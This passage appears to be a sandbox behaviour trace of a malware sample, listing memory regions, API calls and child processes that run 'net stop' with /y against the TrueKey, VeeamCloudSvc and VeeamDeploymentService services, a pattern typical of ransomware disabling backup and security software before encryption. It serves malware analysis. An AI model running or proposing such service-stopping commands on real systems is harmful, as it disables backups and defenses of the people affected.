0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11895 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11896 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11897 start_va = 0xfff50000 end_va = 0xfff82fff entry_point = 0xfff50000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 11898 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11899 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11900 start_va = 0x7fffffda000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 11901 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11902 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11903 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11904 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 11905 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11906 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11907 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11908 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11928 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11929 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 11930 start_va = 0x4c0000 end_va = 0x5bffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 11931 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 11932 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 11933 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 11934 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 11935 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 11936 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 11937 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 11938 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 11939 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 11940 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 11941 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11942 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11943 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 11944 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 11945 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11946 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11947 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 862 os_tid = 0x135c [0117.868] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efb90 | out: lpSystemTimeAsFileTime=0x1efb90*(dwLowDateTime=0xfb6513f0, dwHighDateTime=0x1d48689)) [0117.868] GetCurrentProcessId () returned 0xb04 [0117.868] GetCurrentThreadId () returned 0x135c [0117.868] GetTickCount () returned 0x27223 [0117.868] QueryPerformanceCounter (in: lpPerformanceCount=0x1efb98 | out: lpPerformanceCount=0x1efb98*=1816478600000) returned 1 [0117.869] GetModuleHandleW (lpModuleName=0x0) returned 0xfff50000 [0117.869] __set_app_type (_Type=0x1) [0117.869] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xfff69c9c) returned 0x0 [0117.869] __getmainargs (in: _Argc=0xfff74780, _Argv=0xfff74790, _Env=0xfff74788, _DoWildCard=0, _StartInfo=0xfff7479c | out: _Argc=0xfff74780, _Argv=0xfff74790, _Env=0xfff74788) returned 0 [0117.869] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.869] GetConsoleOutputCP () returned 0x1b5 [0117.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xfff7cec0 | out: lpCPInfo=0xfff7cec0) returned 1 [0117.870] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0117.872] sprintf_s (in: _DstBuf=0x1efb38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0117.872] setlocale (category=0, locale=".437") returned="English_United States.437" [0117.874] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0117.874] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0117.874] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKey /y" [0117.874] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1ef8d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0117.874] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0117.874] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efb28 | out: Buffer=0x1efb28*=0x3d4d40) returned 0x0 [0117.874] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1efb28 | out: Buffer=0x1efb28*=0x3dc0e0) returned 0x0 [0117.874] _fileno (_File=0x7fefdba2a80) returned 0 [0117.874] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0117.874] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0117.874] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0117.874] _wcsicmp (_String1="config", _String2="stop") returned -16 [0117.874] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0117.874] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0117.875] _wcsicmp (_String1="file", _String2="stop") returned -13 [0117.875] _wcsicmp (_String1="files", _String2="stop") returned -13 [0117.875] _wcsicmp (_String1="group", _String2="stop") returned -12 [0117.875] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0117.875] _wcsicmp (_String1="help", _String2="stop") returned -11 [0117.875] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0117.875] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0117.875] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0117.875] _wcsicmp (_String1="session", _String2="stop") returned -15 [0117.875] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0117.875] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0117.875] _wcsicmp (_String1="share", _String2="stop") returned -12 [0117.875] _wcsicmp (_String1="start", _String2="stop") returned -14 [0117.875] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0117.875] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0117.875] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0117.875] _wcsicmp (_String1="accounts", _String2="TrueKey") returned -19 [0117.875] _wcsicmp (_String1="computer", _String2="TrueKey") returned -17 [0117.875] _wcsicmp (_String1="config", _String2="TrueKey") returned -17 [0117.875] _wcsicmp (_String1="continue", _String2="TrueKey") returned -17 [0117.875] _wcsicmp (_String1="cont", _String2="TrueKey") returned -17 [0117.875] _wcsicmp (_String1="file", _String2="TrueKey") returned -14 [0117.875] _wcsicmp (_String1="files", _String2="TrueKey") returned -14 [0117.875] _wcsicmp (_String1="group", _String2="TrueKey") returned -13 [0117.875] _wcsicmp (_String1="groups", _String2="TrueKey") returned -13 [0117.875] _wcsicmp (_String1="help", _String2="TrueKey") returned -12 [0117.875] _wcsicmp (_String1="helpmsg", _String2="TrueKey") returned -12 [0117.875] _wcsicmp (_String1="localgroup", _String2="TrueKey") returned -8 [0117.875] _wcsicmp (_String1="pause", _String2="TrueKey") returned -4 [0117.875] _wcsicmp (_String1="session", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="sessions", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="sess", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="share", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="start", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="stats", _String2="TrueKey") returned -1 [0117.875] _wcsicmp (_String1="statistics", _String2="TrueKey") returned -1 [0117.876] _wcsicmp (_String1="stop", _String2="TrueKey") returned -1 [0117.876] _wcsicmp (_String1="time", _String2="TrueKey") returned -9 [0117.876] _wcsicmp (_String1="user", _String2="TrueKey") returned 1 [0117.876] _wcsicmp (_String1="users", _String2="TrueKey") returned 1 [0117.876] _wcsicmp (_String1="msg", _String2="TrueKey") returned -7 [0117.876] _wcsicmp (_String1="messenger", _String2="TrueKey") returned -7 [0117.876] _wcsicmp (_String1="receiver", _String2="TrueKey") returned -2 [0117.876] _wcsicmp (_String1="rcv", _String2="TrueKey") returned -2 [0117.876] _wcsicmp (_String1="netpopup", _String2="TrueKey") returned -6 [0117.876] _wcsicmp (_String1="redirector", _String2="TrueKey") returned -2 [0117.876] _wcsicmp (_String1="redir", _String2="TrueKey") returned -2 [0117.876] _wcsicmp (_String1="rdr", _String2="TrueKey") returned -2 [0117.876] _wcsicmp (_String1="workstation", _String2="TrueKey") returned 3 [0117.876] _wcsicmp (_String1="work", _String2="TrueKey") returned 3 [0117.876] _wcsicmp (_String1="wksta", _String2="TrueKey") returned 3 [0117.876] _wcsicmp (_String1="prdr", _String2="TrueKey") returned -4 [0117.876] _wcsicmp (_String1="devrdr", _String2="TrueKey") returned -16 [0117.876] _wcsicmp (_String1="lanmanworkstation", _String2="TrueKey") returned -8 [0117.876] _wcsicmp (_String1="server", _String2="TrueKey") returned -1 [0117.876] _wcsicmp (_String1="svr", _String2="TrueKey") returned -1 [0117.876] _wcsicmp (_String1="srv", _String2="TrueKey") returned -1 [0117.876] _wcsicmp (_String1="lanmanserver", _String2="TrueKey") returned -8 [0117.876] _wcsicmp (_String1="alerter", _String2="TrueKey") returned -19 [0117.876] _wcsicmp (_String1="netlogon", _String2="TrueKey") returned -6 [0117.876] _wcsupr (in: _String="TrueKey" | out: _String="TRUEKEY") returned="TRUEKEY" [0117.876] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3dcdf0 [0117.880] GetServiceKeyNameW (in: hSCManager=0x3dcdf0, lpDisplayName="TRUEKEY", lpServiceName=0xfff75750, lpcchBuffer=0x1efa48 | out: lpServiceName="", lpcchBuffer=0x1efa48) returned 0 [0117.881] _wcsicmp (_String1="msg", _String2="TRUEKEY") returned -7 [0117.881] _wcsicmp (_String1="messenger", _String2="TRUEKEY") returned -7 [0117.881] _wcsicmp (_String1="receiver", _String2="TRUEKEY") returned -2 [0117.881] _wcsicmp (_String1="rcv", _String2="TRUEKEY") returned -2 [0117.881] _wcsicmp (_String1="redirector", _String2="TRUEKEY") returned -2 [0117.881] _wcsicmp (_String1="redir", _String2="TRUEKEY") returned -2 [0117.881] _wcsicmp (_String1="rdr", _String2="TRUEKEY") returned -2 [0117.881] _wcsicmp (_String1="workstation", _String2="TRUEKEY") returned 3 [0117.881] _wcsicmp (_String1="work", _String2="TRUEKEY") returned 3 [0117.881] _wcsicmp (_String1="wksta", _String2="TRUEKEY") returned 3 [0117.881] _wcsicmp (_String1="prdr", _String2="TRUEKEY") returned -4 [0117.881] _wcsicmp (_String1="devrdr", _String2="TRUEKEY") returned -16 [0117.881] _wcsicmp (_String1="lanmanworkstation", _String2="TRUEKEY") returned -8 [0117.881] _wcsicmp (_String1="server", _String2="TRUEKEY") returned -1 [0117.881] _wcsicmp (_String1="svr", _String2="TRUEKEY") returned -1 [0117.881] _wcsicmp (_String1="srv", _String2="TRUEKEY") returned -1 [0117.881] _wcsicmp (_String1="lanmanserver", _String2="TRUEKEY") returned -8 [0117.882] _wcsicmp (_String1="alerter", _String2="TRUEKEY") returned -19 [0117.882] _wcsicmp (_String1="netlogon", _String2="TRUEKEY") returned -6 [0117.882] NetServiceControl (in: servername=0x0, service="TRUEKEY", opcode=0x0, arg=0x0, bufptr=0x1efa50 | out: bufptr=0x1efa50) returned 0x889 [0117.882] wcscpy_s (in: _Destination=0xfff780d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0117.882] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0117.883] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xfff75b50, nSize=0x800, Arguments=0xfff77f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0117.885] GetFileType (hFile=0xb) returned 0x2 [0117.885] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef918 | out: lpMode=0x1ef918) returned 1 [0117.886] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff75b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1ef910, lpReserved=0x0 | out: lpBuffer=0xfff75b50*, lpNumberOfCharsWritten=0x1ef910*=0x1e) returned 1 [0117.886] GetFileType (hFile=0xb) returned 0x2 [0117.886] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef918 | out: lpMode=0x1ef918) returned 1 [0117.886] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff51efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef910, lpReserved=0x0 | out: lpBuffer=0xfff51efc*, lpNumberOfCharsWritten=0x1ef910*=0x2) returned 1 [0117.886] _ultow (in: _Dest=0x889, _Radix=2029952 | out: _Dest=0x889) returned="2185" [0117.886] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xfff75b50, nSize=0x800, Arguments=0xfff77f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0117.887] GetFileType (hFile=0xb) returned 0x2 [0117.887] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef918 | out: lpMode=0x1ef918) returned 1 [0117.887] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff75b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1ef910, lpReserved=0x0 | out: lpBuffer=0xfff75b50*, lpNumberOfCharsWritten=0x1ef910*=0x34) returned 1 [0117.887] GetFileType (hFile=0xb) returned 0x2 [0117.887] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef918 | out: lpMode=0x1ef918) returned 1 [0117.888] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xfff51efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef910, lpReserved=0x0 | out: lpBuffer=0xfff51efc*, lpNumberOfCharsWritten=0x1ef910*=0x2) returned 1 [0117.888] NetApiBufferFree (Buffer=0x3d4d40) returned 0x0 [0117.888] NetApiBufferFree (Buffer=0x3dc0e0) returned 0x0 [0117.888] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop TrueKey /y" [0117.888] exit (_Code=2) Process: id = "338" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x783ad000" os_pid = "0x1354" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamCloudSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11909 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11910 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11911 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11912 start_va = 0x50000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11913 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11914 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11915 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11916 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11917 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11918 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11919 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 11920 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11921 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11922 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11923 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11924 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11925 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11926 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11927 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 863 os_tid = 0xa34 Process: id = "339" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6dccd000" os_pid = "0x137c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamDeploymentService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11948 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11949 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11950 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11951 start_va = 0xd0000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 11952 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11953 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 11954 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11955 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 11956 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11957 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 11958 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 11959 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 11960 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11961 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11962 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 11963 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11964 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 11965 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 11966 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12060 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12061 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 12062 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 12063 start_va = 0x7fef43a0000 end_va = 0x7fef43b1fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12064 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 12065 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 12066 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 12067 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12068 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12069 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: 